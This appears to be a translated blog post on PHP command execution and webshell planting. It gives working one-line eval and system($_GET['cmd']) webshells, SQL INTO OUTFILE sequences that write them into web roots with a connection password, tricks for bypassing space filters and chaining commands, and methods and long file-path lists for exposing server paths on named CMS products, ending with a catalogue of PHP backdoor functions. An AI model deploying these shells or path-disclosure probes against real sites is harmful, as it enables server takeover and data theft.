To use the shell in the php background, you need to know the path of php. The following article will explain how to explode the path of php.

Preface:
I have recently been learning PHP code auditing. I recommend this book: Code Auditing Enterprise-level Web Code Security Architecture_by Yin Yi.
The previous article introduced code execution, now write the command execution.
Command execution means executing commands. Executing win and Linux system commands.
There are several functions in PHP that can execute system commands. I roughly divided them into two categories (with and without return results).

Return the execution result.
Directly pass in the command and the function returns the execution result.

system($_GET['cmd']);
//Directly echo the result printout
1
2
echo exec($_GET['cmd']);
//Execute the command specified by the parameter
1
2
passthru($_GET['cmd' ]);
//Execute the external program and display the original output
1
2
echo shell_exec($_GET['cmd']);
//Execute the command through the shell environment. And return the complete output as a string
1
2
echo `$_GET['cmd']`;
//Backticks also execute the command, the principle is to call shell_exec()
1
2
No execution result is returned, the execution
result is not returned, and the file is returned pointer, but the command was executed

popen($_GET['cmd'],'w');//r,w represents reading and writing
popen('whoami >> D:/2.txt','r');//Write information to file
1
2
proc_open($_GET['cmd']);
1
Command execution tips
1. During the command execution process, we will encounter the situation where spaces are deleted or replaced.
In Win: use = instead of spaces

$cmd="type=../1.txt";
system($cmd);
1
2
In Linux: use < to replace spaces

$cmd="cat<../2.txt";
system($cmd);
1
2
2. During the command execution process, we will execute multiple commands. In
Win:
continuous operator &, the previous execution is normal or If there is an error, it can be executed later.
&& If there is an execution error in the front, the command cannot be executed later.

$cmd="ipconfig&whoami";
system($cmd);
1
2
In Linux:
semicolon; is a continuity operator that connects executed statements

$cmd="ifconfig;whoami;";
system($cmd);
1
2
Precautions
PHP has its own command injection prevention functions escapeshellcmd() and escapshellarg() escapshellcmd()
filters the entire command
escapshellarg() is guaranteed to be passed in Parameters in the command execution function exist in the form of string parameters.
Note that using escapeshellcmd() and escapeshellarg together will cause special characters to escape.

==================================================================

To use the shell in the php background, you need to know the path of php. The following article will explain how to explode the path of php! ! !

method one:

CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );

INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');

SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';

----Execute the above at the same time, create a table named: xiaoma under database: mysql, the field is xiaoma1, export to E:/wamp/www/7.php

One sentence connection password: xiaoma

Method Two:

Create TABLE xiaoma (xiaoma1 text NOT NULL);

Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');

select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';

Drop TABLE IF EXISTS xiaoma;

Method three:

Read the file content: select load_file('E:/xamp/www/s.php');

Write a sentence: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'

cmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

Method four:

select load_file('E:/xamp/www/xiaoma.php');

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

Then visit the website directory: http://www.xxxx.com/xiaoma.php?cmd=dir

PHP path method collection:

1. Single quote explosion path

illustrate:

Adding single quotes directly after the URL requires that the single quotes are not filtered (gpc=off) and the server returns an error message by default.

www.xxx.com/news.php?id=149′

2. Wrong parameter value explosion path

illustrate:

Change the parameter value to be submitted to an error value, such as -1. Try it when -99999 single quotes are filtered.

www.xxx.com/researcharchive.php?id=-1

3. Google explosion path

illustrate:

Use keywords and site syntax to search for web page snapshots of error pages. Common keywords include warning and fatal error. Note that if the target site is a second-level domain name and the site is connected to its corresponding top-level domain name, you will get much more information.

Site:xxx.edu.tw warning

Site:xxx.com.tw “fatal error”

4. Test file explosion path

illustrate:

Test files exist in the root directory of many websites, and the script code is usually phpinfo().

www.xxx.com/test.php

www.xxx.com/ceshi.php

www.xxx.com/info.php

www.xxx.com/phpinfo.php

www.xxx.com/php_info.php

www.xxx.com/1.php

5. phpmyadmin explosion path

illustrate:

Once you find the management page of phpmyadmin, and then access certain specific files in this directory, it is very likely that the physical path will be exposed. As for the address of phpmyadmin, you can use tools like wwwscan to scan it, or you can choose Google. PS: Some BT websites will be written as phpMyAdmin.

1. /phpmyadmin/libraries/lect_lang.lib.php

2./phpMyAdmin/index.php?lang[]=1

3. /phpMyAdmin/phpinfo.php

4. load_file()

5./phpmyadmin/themes/darkblue_orange/layout.inc.php

6./phpmyadmin/libraries/select_lang.lib.php

7./phpmyadmin/libraries/lect_lang.lib.php

8./phpmyadmin/libraries/mcrypt.lib.php

6. Find the path for the configuration file

illustrate:

If the injection point has file read permission, you can manually load_file or use a tool to read the configuration file, and then find the path information from it (usually at the end of the file). The default paths of the configuration files of the web server and PHP under each platform can be checked online. Here are some common ones.

Windows:

c:\windows\php.ini php configuration file

c:\windows\system32\inetsrv\MetaBase.xml IIS virtual host configuration file

Linux:

/etc/php.ini php configuration file

/etc/httpd/conf.d/php.conf

/etc/httpd/conf/httpd.conf Apache configuration file

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache/conf/extra/httpd-vhosts.conf virtual directory configuration file

7. nginx file type error parsing path

illustrate:

This method was accidentally discovered yesterday. Of course, it requires that the web server is nginx and has a file type parsing vulnerability. Sometimes /x.php is added after the image address. Not only will the image be executed as a php file, but the physical path may also be revealed.

www.xxx.com/top.jpg/x.php

8. Others

dedecms

/member/templets/menulit.php

plus/paycenter/alipay/return_url.php

plus/paycenter/cbpayment/autoreceive.php

paycenter/nps/config_pay_nps.php

plus/task/dede-maketimehtml.php

plus/task/dede-optimize-table.php

plus/task/dede-upcache.php

wp-admin/includes/file.php

wp-content/themes/baiaogu-seo/footer.php

ecshop mall system exposed path vulnerability file

/api/cron.php

/wap/goods.php

/temp/compiled/ur_here.lbi.php

/temp/compiled/pages.lbi.php

/temp/compiled/user_transaction.dwt.php

/temp/compiled/history.lbi.php

/temp/compiled/page_footer.lbi.php

/temp/compiled/goods.dwt.php

/temp/compiled/user_clips.dwt.php

/temp/compiled/goods_article.lbi.php

/temp/compiled/comments_list.lbi.php

/temp/compiled/recommend_promotion.lbi.php

/temp/compiled/search.dwt.php

/temp/compiled/category_tree.lbi.php

/temp/compiled/user_passport.dwt.php

/temp/compiled/promotion_info.lbi.php

/temp/compiled/user_menu.lbi.php

/temp/compiled/message.dwt.php

/temp/compiled/admin/pagefooter.htm.php

/temp/compiled/admin/page.htm.php

/temp/compiled/admin/start.htm.php

/temp/compiled/admin/goods_search.htm.php

/temp/compiled/admin/index.htm.php

/temp/compiled/admin/order_list.htm.php

/temp/compiled/admin/menu.htm.php

/temp/compiled/admin/login.htm.php

/temp/compiled/admin/message.htm.php

/temp/compiled/admin/goods_list.htm.php

/temp/compiled/admin/pageheader.htm.php

/temp/compiled/admin/top.htm.php

/temp/compiled/top10.lbi.php

/temp/compiled/member_info.lbi.php

/temp/compiled/bought_goods.lbi.php

/temp/compiled/goods_related.lbi.php

/temp/compiled/page_header.lbi.php

/temp/compiled/goods_script.html.php

/temp/compiled/index.dwt.php

/temp/compiled/goods_fittings.lbi.php

/temp/compiled/myship.dwt.php

/temp/compiled/brands.lbi.php

/temp/compiled/help.lbi.php

/temp/compiled/goods_gallery.lbi.php

/temp/compiled/comments.lbi.php

/temp/compiled/myship.lbi.php

/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

/includes/modules/cron/auto_manage.php

/includes/modules/cron/ipdel.php

ucenter explosion path

ucenter\control\admin\db.php

DZbbs

manyou/admincp.php?my_suffix=%0A%0DTOBY57

z-blog

admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

php168 explosion path

admin/inc/hack/count.php?job=list

admin/inc/hack/search.php?job=getcode

admin/inc/ajax/bencandy.php?job=do

cache/MysqlTime.txt

PHPcms2008-sp4

Registered users can access after logging in

phpcms/corpandresize/process.php?pic=../images/logo.gif

bo-blog

PoC:

/go.php/<[evil code]

CMSeasy explodes website path vulnerability

The vulnerability appears in the file menu_top.php

lib/mods/celive/menu_top.php

/lib/default/ballot_act.php

lib/default/special_act.php

===========================================================

The functions commonly used by PHP backdoor Trojans can be roughly divided into four types:

1. Execute system commands: system, passthru, shell_exec, exec, popen, proc_open

2. Code execution and encryption: eval, assert , call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

3. File inclusion and generation: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

1. Execute system command:

system function

//test.php?cmd=ls

system($_GET[cmd]);

passthru function

//test.php?cmd=ls

passthru($_GET[cmd]);

shell_exec function

//test.php?cmd=ls

echo shell_exec($_GET[cmd]);

exec function

//test.php?cmd=ls

$arr = array();

exec($_GET[cmd],$arr);

print_r($arr);

popen function

//test.php?cmd=ls

$handle = popen('$_GET[cmd], 'r');

$read = fread($handle, 2096);

echo $read;

pclose($handle);

proc_open function

//test.php?cmd=ls

$descriptorspec = array(

0 => array('pipe', 'r'),

1 => array('pipe', 'w'),

2 => array('pipe', 'w'),

);

$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);

fclose($pipes[0]);

$output = array();

while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));

print_r($output);

2. Code execution and encryption:

eval function

//The most common sentence Trojan

eval($_POST[cmd]);

base64_decode function